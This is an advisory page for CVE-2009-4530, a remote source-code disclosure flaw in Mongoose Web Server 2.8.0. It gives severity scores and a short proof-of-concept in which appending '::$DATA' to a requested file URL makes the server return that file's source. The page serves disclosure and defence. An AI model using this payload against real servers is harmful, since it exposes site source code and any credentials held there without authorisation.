Mongoose Web Server 2.8.0 remote source disclosure

2009.10.18

Credit: Dr_IDE

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-4530

CWE: CWE-200

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: http://code.google.com/p/mongoose/
#
#######################################################

- Description -

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.

Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.

- Technical Details -

http://[ webserver IP][:port]/[ file ][::$DATA]

http://172.16.2.101:8080/index.html::$DATA
http://172.16.2.101:8080/index.php::$DATA

[pocoftheday.blogspot.com]

References:

http://secunia.com/advisories/36934

http://packetstormsecurity.org/0910-exploits/mongoose-disclose.txt

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Mongoose Web Server 2.8.0 remote source disclosure

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Mongoose Web Server 2.8.0 remote source disclosure

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.